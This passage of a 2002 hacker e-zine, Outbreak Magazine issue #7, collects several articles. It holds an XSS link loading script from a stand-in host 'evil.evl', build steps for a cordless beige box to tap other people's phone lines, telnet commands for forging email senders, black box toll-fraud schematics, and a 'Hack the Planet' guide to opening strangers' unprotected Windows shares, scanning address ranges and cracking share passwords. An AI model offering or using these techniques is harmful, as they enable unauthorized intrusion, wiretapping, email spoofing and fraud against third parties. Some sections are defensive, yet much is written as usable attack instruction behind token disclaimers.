a step back and picture ourselves the way we wish to be pictured society
would be awhole better place.
Now that I have that out of my way, lets begin. Why are hackers so
discriminated upon? Wait, let me rephrase that real fast, why are people
that want to gain knowledge and freedom frowned upon? Why does society
try to make us fit in their "mold" of what we should look like and dress?
The fact is that there are those out there that must fit into this mold and
be "cool" and there are those that could give a flying fuck. Those are the
ones that society discards and throws to the side. You never see "hackers"
portrayed appropriately in movies and on TV. Most movies I see now adays
show "children" breaking into someones highly confined system and wrecking
it till theres nothing left. Which is in some cases sad but true, but the
involuntary acts of kindness are astounding, most "hackers" are in it for
the thrill of knowing they did something. They did it themselves, from what
they have learned and read themselves, it has paid off. But is that how it
portrayed?? I don't think so.
Therefore they must turn the public against us, and make everything we do
wrong and obscene. The truth is that the government is scared of us, because
of want we know, and what they don't. I believe that this will all come to
end, its like history, everything evolves and falls, it is only time before
the so called "hackers" are running your life, and you would of wished that
you hadn't blasted them so much before. How can I say this? Well, lets
see..... technology is going to expand and run your life.
Everything that you do will concentrate on a guy or machine typing on a
keyboard somewhere in the world, and who is this? Its the guy you blasted
during school, just because he didn't have friends, just because he didn't
have a social life, just because he was different, Just because every time
you saw him he was doing homework and reading books. Just you wait the tables
will turn my friend, and when you, the "cool" people are drowning in your
own vomit of stupidity and realize what has happen it will be to late.
The day is coming you just wait and see.
sin|cal
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 10 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
######################################################################
########### responsibilities of trusted hosts -dropcode ############
######################################################################
just as in real life, here on the internet we mustn't make the
assumption that we can fall vitcim only to our own insecurities.
often, it is the insecurities of others that target us as victims.
what follows is the opinion of the writer and does not necessarily
reflect the opinions of the publisher, however it might... and
probably should. *smirk*
a certain class of vulnerability, known as cross-site scripting, has
been increasingly potent on the internet over the last two years.
since its original recognition by CERT in February of 2000 cross-site
scripting vulnerabilities have surfaced in thousands of websites all
accross the web.
cross-site scripting takes advantage of weak verification procedures
when dynamically constructing webpages containing user-entered data.
this vulnerability makes it possible to embed malicious code into
websites with poorly written cgis.
----------------------------------------------------------------------
<a href="http://trustedhost.com/guestbook.cgi? comment=
<script src='http://evil.evl/evilcode'></script>">!!!</a>
----------------------------------------------------------------------
the attack itself is simple, the solution to the problem is simple,
but the implications and impact of the vulnerability are tremendous.
simply passing malicious code as an attribute to a vulnerable cgi
will cause the user to inadvertently execute the code.
for those having trouble grasping this, consider the following. sure,
malicious code has been a problem for promiscuous websurfers for as
long as malicious coders have been making webpages, but when malicious
code can be embeded into webpages that are trusted by even the most
wary websurfers, thats when it becomes epidemic.
cross-site scripting vulnerabilities have been found on some of the
most widely trusted hosts on the internet. Microsoft, NBC, Lycos,
Excite, CNet, Netscape, Ebay, and plenty more.
now, imagine visiting a site with as much credibility as those listed
above and coming away from it with a virus. where does the blame go?
considering the amount of dependency people put on personal computers,
and the amount of traffic generated by sites so credible, compensation
for loss is probably very daunting in the eyes of the organizations
who own those websites, and whos weak programming was exploited. this
is probably why they always use the malicious coders as the scapegoat.
don't get me wrong, of course those putting malicious code into effect
should be held responsible for the damage they cause, but i also feel
that a certain amount of responsability comes with self-promoted
credibility. after all, the damage could have been easily avoided had
their cgis filtered the certain tags.
i suppose the only real purpose this text has is to educate the
audience of the great injustice presented when large organizations
can mass-promote themselves, and not take responsibility when their
insecurities victimize people.
*shrugs* i guess thats big business.
----------------------------------------------------------------------
greets go to savvyD, ramb0x, gr3p, kleptic, dirv, jenny, lexi, lenny
turb, oj, smiley, snad... anyone i'm forgettin, sorry.
----------------------------------------------------------------------
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 11 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Cordless Beige Box
------------------
By snadman
Purpose
Have you ever been beiging off of cans and all of a sudden, well you see someone
and you don't have a grey box with you? Well, if you had a cordless Beige Box,
then there wouldn't be a reason to worry in the first place, because you'd be up
in the bushes on the side of someone's house while you're beiging off of a can
right by the street! The cordless Beige Box gets around the problems of being seen.
Only time you have to worry about being seen is when you're unscrewing the security
bolts on the can and hooking your beige up, and then when you're going to leave
that area and have to take off your beige. Through creating this, though, there
were a few minor difficulties which were overcome through use of what we already had.
Materials
Cordless Phone (Base and Handset)
2 ft. Phone Cord
1x 9 volt
1x 7.2v Rechargeable Battery (from remote control cars)
^^^NOTE:Prolly want to buy a nice $20 trickle charger^^^
4x Small Gator Clips
Base/Charger Schematic
CLIP=gator clip
BASE= the base? lol
RB= 7.2v rechargeable battery
RBPlug= 7.2v rechargeable battery plug MB= magnet buzzer
R= Red line
G= Green line
+= + line
-= - line
||= Power Plug on Base []= Modular Plug on Base _= antenna *= Clip connection point
BASEBASE_________________________
BASEBASE
BASEBASE||+++++++++++++CLIP*RBPlug++++RBRBRBRB
BASEBASE||-------------CLIP*RBPlug----RBRBRBRB
BASEBASE
BASEBASE[]RRRRRRRRRRRRRCLIP*terminal
BASEBASE[]GGGGGGGGGGGGGCLIP*terminal
BASEBASE
Step By Step
OK, now the schematic is tough so you may need this. First, with your phone cord,
leave one end with the modular plug still attatched, but strip the other end. Now
strip the Red and Green wires inside, which will be the center two if not colored
or if there are only two that's them. Solder on the clips to the two stripped Red
and Green wires. Electric Tape/shrink-wrap to insulate them. Now, your *old*
(hopefully) cordless phone base should have a little power supply for power which
goes to a power plug thingy in the wall. Well, unplug the power supply from the
wall first (dumbass alert if you didn't do this) and cut the power supply's wires.
Now that it's cut, the end that doesn't plug into the wall is the one you want.
It should be a little circle on the end that plugs into the base of your phone.
Strip these wires so the wiring is exposed. Solder on some alligator clips. Now,
please please do this...electric tape/shrink-wrap the alligator clips so they never
touch. They will be close together later on and if they touch, not only will it
drain your batteries but it will that to glow, ruin your clips, and also start some
plastic on fire (which does not smell good!). Now, plug the circle part into the
base of the phone, no lights come up as there is no power to the base yet. Now,
with a charged 7.2v Rechargeable Battery, position the alligator clips so that
they are clipped onto the metal pegs inside the plug on the battery. If it doesn't
turn on, well then you have them mixed up (pos and neg) so switch which clips are
clipped ot which pegs. There are only two clips and two pins so there are only two
ways to do it, should work on way or the either. Somehow mark on the wire that ash
the clips that goes to the base which is negative and which is poisitive for
convenience.
Next...
Now your base has power and the phone cord is ready to be hooked up to the terminals
in the can, but what if all of a sudden your cordless handset dies...do you want to
waste battery power as well as time to charge that bitch up? No! So do what I did,
get a bunch of cheap 9 volts. Here's how to do that...
Handset Setup
This isn't too tough. Take your *old* cordless battery for that phone. It should plug
into the handset through its own plug which isn't a normal one. Cut the wires from the
irregular plug to the battery as close to the battery as you can and strip the wires.
Now, take a 9v battery plug(thing with two silver circle to clip the 9v into with red
and black wires coming out of it) and twists red to red, black to black. It's simple
dude. Here are some pictures of mine. Of course, I never go out Beige Boxing and I don't
support people doing that, this is just a bunch of rambling information.
Disclaimer #1
This Is Meant for Educational Purposes Only, and is not meant To Be Directly Related To
Illegal Conduct Such As Beige-Boxing. I Also Do Not Take Responsibility for People Who
Use This Document In an Illegal sense...
Disclaimer #2
Anyone Who Alters This Text will be Sentenced To Hell, Or Better Yet, Afghanistan...
Greetz:
Hmmm...everyone in #mymeat and #outbreakzine...
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 12 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
--------------------------------------------------------------------------------
As ye hath sewn so shall ye reap... (Atleast that is what my korn poster says)
By Atomichael aka Atomic Chaos
About a year and a half ago I was getting pretty bored. Bored and Lonely in this
shit hole they call a city I decided to write some simple code that would scan
all of Pacbell's DSL subnets for users in my area running *nix based systems.To
my suprise I came across several insecure routers (in this case no password)
used by either home users or small businesses to connect their LANs to the
internet. Oh yea and I also found like 2 or 3 redhat boxes joy! With these
routers I did nothing more than test them by creating a loop back to my machine.
The routers offered me little entertainment since they were some generashits
anyway. I soon forgot about the routers, the three redhat boxes, my doomed quest
to find geeky friends in the local area, and eventually the logs were deleted.
Everything was fine until a couple days ago when I recieved these notices while
trying to connect to IRC on dalnet:
liberty.nj.us.dal.net- *** Got Ident response
You have been Autokilled.
liberty.nj.us.dal.net- *** You are not welcome on this network.
liberty.nj.us.dal.net- *** Autokilled for Your host is banned due to excessive
infected drones and open insecure routers. Please go to
http://kline.dal.net/exploits/ or contact pacbell.net. [AKILL ID:1024243947K-a]
(2002/06/16 12.12)
liberty.nj.us.dal.net- *** Your hostmask is
atomichael!fold@adsl-64-168-101-190.dsl.scrm01.pacbell.net
liberty.nj.us.dal.net- *** For more information, please mail kline@dal.net and
include everything shown here.
Closing Link: 0.0.0.0 (Your host is banned due to excessive infected drones and
open insecure routers. Please go to http://kline.dal.net/exploits/ or contact
pacbell.net. [AKILL ID:1024243947K-a] (2002/06/16 12.12))
And Dalnet's http://kline.dal.net/exploits/ :
Pacbell DSL Users
Due to a severe security issue we have regrettably been forced to suspend access
from Pacbell's DSL accounts to DALnet. We are in close contact with Pacbell and
hope to resolve this issue within the next couple of weeks. Updates to the
situation will be posted here as they become available and further details on
the issue can be found by clicking here.
There were no further details. I will not be clicking here on dalnet for a
while.
All criticism for supporting ma bell aside I like my adsl. I like being able to
connect to IRC with my adsl. I do not like little kiddy zygotes who create
packet shit storms for their own malformed and superfluous goals. Don't make me
come to your homes and wrap garden hoses around your necks until your beady
little eyes pop out of your deformed little heads. Despite my overwhelming
hatred for these putrid sacks of shit I cannot help but think that I am somewhat
responsible for my own fate.
Could this have been avoided had I informed Pacbell or would they have just
ignored me and allowed such decadence to progress? We will never know. Perhaps a
lesson can be learned from all of this. If your neighbor's dog is eating
chickens cut off it's balls before it reproduces and KFC goes out of business.
No that's not it. If your chicken is cutting off your neighbors balls.. I mean
when your dog is choking on a bone at KFC don't blame the chicken because you
didn't have the balls to cut your neighbor off while pulling out of your drive
way thus altering the space time continuum just enough to maybe save yourself a
trip to the vet.
Efnet rules Dalnet drools. Oh yea and who's idea was it to implement DCCALLOW on
dalnet anyhow. I do not appreciate being forced to /quote dccallow +nickname for
every person I'd like to recieve a -virus- from.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 13 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
------------------------------------------------------------------------------------------
SMTP:Fakemail and SPAM
By: Turbanator
------------------------------------------------------------------------------------------
SMTP is a pretty simple thing to learn. First of all SMTP stands for Simple Mail Transfer
Protocal. That means "(SMTP) A protocol defined in STD 10, RFC 821, used to transfer
electronic mail between computers, usually over Ethernet. It is a server to server protocol,
so other protocols are used to access the messages. The SMTP dialog usually happens in the
background under the control of the message transport system, e.g. sendmail but it is possible
to interact with an SMTP server using telnet to connect to the normal SMTP port, 25".
Usually to take advatage of SMTP you would need a SMTP server, or a shell account that supports
SMTP. Lets use my telnet shell account at freeshell.org.
(NOTE:THE $ indicates the command prompt at the shell, whatever is after the $ is what would
be typed.)
First telnet to the host through port 25
$Telnet sdf.lonestar.org 25
Then one connected, be nice to the host by typing Helo
$Helo sdf.lonestar.org
Then think of who your going to send the email to, who it will be from, and what it will say.
Once you've done that you can begin the mail by typing the following into the shell prompt:
(NOTE:This is only used as an example, you can type in whatever you want for the from, rcpt, and data.)
$Mail from: aol@aol.com rcpt: bob@aol.com data:Hi bob this is AOL, your powned! .quit
The .quit at the end will tell the SMTP server to end the message and send it.
Now why would I want to know this you ask? There are alot of reasons. Spammers for instance
use techniques like this to send you spam, maybe now you can send them a little spam (although I
dont encourage it!). Also this is good for freaking people out and making them cancel their AOL
accounts (I havent dont that ;) ). SMTP can be used for good and for bad, it all depends on the
person who imputs the information. I hoped this has helped anyone who has been wondering about
SMTP, or just wants to read something cool.
------------------------------------------------------------------------------------------
This text file was written by:Turbanator
For:Outbreak
The author can be contacted at:turbanator2k2@yahoo.com, AIM=Turbanator2k2
------------------------------------------------------------------------------------------
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 14 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
/-/-/-/-/-/-\-\-\-\-\-\
<:-\-Black Box Plans-/-:>
\-\-\-\-\-\-/-/-/-/-/-/
By - evo255
email - evo255x@hotmail.com / dalnet> #hacking
Ok so here we go after many days of work with this " simple to build " box
I've come to a conclusion .... This shit doesn't work! And feel free to prove
me wrong.
Lets start with what a black box is. BLACK BOX is a device that is hooked up
to your phone that fixes your phone so that when you get a call, the caller doesn't
get charged for the call. This is good for calls up to 1/2 hour, after 1/2
hour the phone company starts charging anyway because they think something weird
about your phone just ringing for half and hour. The box keeps the line voltage
from dropping to 10v when you answer your phone. The line is instead kept at 36v
and it will make the phone think that it is still ringing while your talking.
Now after much testing of the line with my electricity tester I've come to many
discoveries that aren't mentioned in other text's, the voltage you want to measure
in to see if its working is AC because it is kept at 0 volts until someone
calls you from that point it will jump up from 0 to 36-49V ... why somewhere in
between there you ask? Well it seems in different area of the U.S and I think the
world it supplies different voltage, in U.S GA it was 44V. So someone calls you
( pfft right as if someone would call your loser ass ) and it jumps up... you pick
it up it should drop down to around 10V and stay there... What the resistor your
going to put on the line is "SUPPOSED" to do is keep that voltage from dropping
below 36V so it looks like its ringing and ringing (simple eh?). But after much
testing with the proper resistor and other resistors I've proven it fails to work,
and not only does the voltage drop but also it kills the connection and gives the
caller a busy signal. Anyway, here are the schematics for the box try it your self
I'm sure you will find the same results as I tried this with multiple phone lines and
phones. I think what happened is this used to work somehow previously but the phone
company found a way to fix the line for it * shrug *
All parts are available at Radio Shack. (As fucking usual)
** Schematic 1 for most phones **
** LED ON: BOX ON **
FROM >--------------------GREEN-> TO
LINE >--! 1.8k LED !---RED--> FONE
!--/\/\/\--!>--!
! !
------>/<-------
SPST
Parts: 1 1.8k 1/2 watt resistor
1 1.5v LED
1 SPST switch
*You may just have two wires which you connect together for the switch.
** Schematic 2 for all phones **
** LED ON: BOX OFF **
FROM >---------------GREEN-> TO
LINE >------- ---RED--> FONE
! LED !
---->/<--!>--
! !
---/\/\/---
1.8k
Parts: 1 1.8k 1/2 watt resistor
1 1.5v LED
1 DPST switch
If you look close and your not a retard you will notice all your basically doing
is putting a 1.8k 1/2watt resistor on the red wire of your phone line. Simple right?
WRONG. How do you know it's working? How do you know your phone will work? Well, you
got to test it! So get daddies old AC/DC/Ohm tester out and touch the red pen to the
red wire and black to green and make sure your testing the AC on the wire. That way
when it doesn't work you will see how it doesn't work. =)
Anyway, this evo255 pissed because he wasted a lot of time and came up with
the result that this shit doesn't work any more.
Feel free to try and experiment and hack it yourself maybe you will find
another way to get the same result... when you do email me and tell me how
you did.
Much thanks to dropcode for his help in obtaining most this info as well.
- evo255 (evo255x@hotmail.com)
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 15 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
bluecat9's rantz on Winblowz Netbios Protection & Hackin'.
So you have Winblowz and you wanna hack the planet?!? Why not?
Protection:
If you use MS Windows, Broadband, and your PC is on a home network (LAN),
with "Shares" you may be a redneck. To test obtain your IP (Start>Run>Type:
WINIPCFG), Then (Start>Run>Type: \\YOURIP) and press ENTER. Wait a second, if
you got an error message your not vulnerable and can skip to "Hack the Planet."
But, if you got an Explorer-Like window with your shares displayed you ARE vulnerable.
By this I mean, everyone on the
Internet can access your "Shares" just as you or other
people in your house on other computers do on your network. So, how do you protect
yourself? Here are some resolutions, the easiest but 100% fix is to change your
Share's name from "C" or what ever it is named, to "C$" this will make the Share
hidden. The only difference now is when you want to access a share you will have to
type in the full path to the share. Example: Start, Run, Type \\YOURPCNAME\C$,
and press Enter. Now, if someone does happen to peek at your network they will not see
the shares, but if they guess the name of your share they can access it just as
you would. It's not a good idea to use simple share names such as A, B, C, which can be
easily guessed. Password protection is not a 100% fix for this problem, but a good
idea. Some other solutions are, installing a firewall, using USB vs Ethernet for
your broadband modem, removing the shares altogether, unbinding the service
(File and Printer Sharing) from the protocol (TCP/IP) that is bound to the
adapter (NIC) that is attached to your broadband modem. Purchasing a new
broadband modem which has a built-in firewall. Ok so your protected, let's hack
already!
Hack The Planet:
Now you know about the issue, let's find someone that isn't protected! (evil
laugh) It's as easy as obtaining an IP and performing the following,
Start, Run, Type: \\THIERIP. Man was that hard! So, you got someone's IP,
tried that, and you got an error message? They're not vulnerable, deal with it? Or
You
saw all the pretty little shares!!! Alriiiight! The best we can hope for is a user
who has their entire hard drive shared out with full access. If not, you may have
fun just browsing their files? So you didn't get an error message but they don't have
any viewable shares?!? Try guessing a few hidden share names, like
A$,B$,C$,D$,E$,HD$, MY DOCUMENTS$ and PRINTER$. Oh sure you'll have fun printing to their
printer. OK, you know how to get in the door, but it takes to long trying one IP
after another! Sure it does. Search the internet for "NETBIOS SCANNER" or "SHARE SCANNER"
and I'm sure you'll come up with something fun which will most likely let you
scan entire class C's! (x.x.x.0 to x.x.x.255) That should get the party started!
Now your on your way to hackin' the planet but you've run into shares that
are password protected, no worries. Because lo and behold there are programs
available to crack share passwords in a matter of seconds! A good search for "NETBIOS
SHARE PASSWORD CRACKER" or something similar should do the trick. Know this, some
ISP's block netbios communication (Port 139) through their network leaving you
unable to connect remotely to another network using netbios, so sorry.
Remember. You're limited only by your own imagination.
--bluecat9
_______________________________________________________________
|______________________________________________________________ |
|| ||
|| ___ _ ____ _ ||
|| / _ \ _ _| |_| __ ) _ __ ___ __ _| | _ ||
|| | | | | | | | __| _ \| '__/ _ \/ _` | |/ / ||
|| | |_| | |_| | |_| |_) | | | __/ (_| | < ||
|| \___/ \__,_|\__|____/|_| \___|\__,_|_|\_\ ||
|| ||
||_____--------------------------------------------------______||
|_______/-----------------------------------------------\_______|
___ _ _
| __(_)_ _ __ _| |
| _|| | ' \/ _` | |
__ |_| |_|_||_\__,_|_|
\ \ / /__ _ _ __| |___
\ \/\/ / _ \ '_/ _` (_-<
\_/\_/\___/_| \__,_/__/
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PUT THE WORDS IN HERE:
Well, here is issue #7. We're finally learning how to get these
out a bit quicker with more content. So I hope you all enjoy
this issue. It's jammed packed full of some good stuff.
And as always, we are ALWAYS looking for articles written by
our readers. That's how Outbreak strives. So if you have an
article that you've written laying around on your hard drive..
send that puppy our way. Or if you want to write something for
us, that would be cool to. The more articles the better.
Send all texts to: outbreak@fwaggle.net
Well, enjoy #7, and start sending me stuff for #8.
Thanks to everyone who submitted articles for this issue.
- Outbreak Staff
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++
³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij
+-+-+-+-+-+-+-+-+
-°°°±±±±±²²²²²ÛÛÛÛÛÛÛÛÛ²²²±±°ð-|O|u|t|b|r|e|a|k|ð°°°±±±±±²²²²²ÛÛÛÛÛÛÛÛÛ²²²±±°-
+-+-+-+-+-+-+-+-+
³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij
Outbreak Contents may not be used with out express written permission
By the Editor - outbreak@fwaggle.net
COPYRIGHT©® 2002.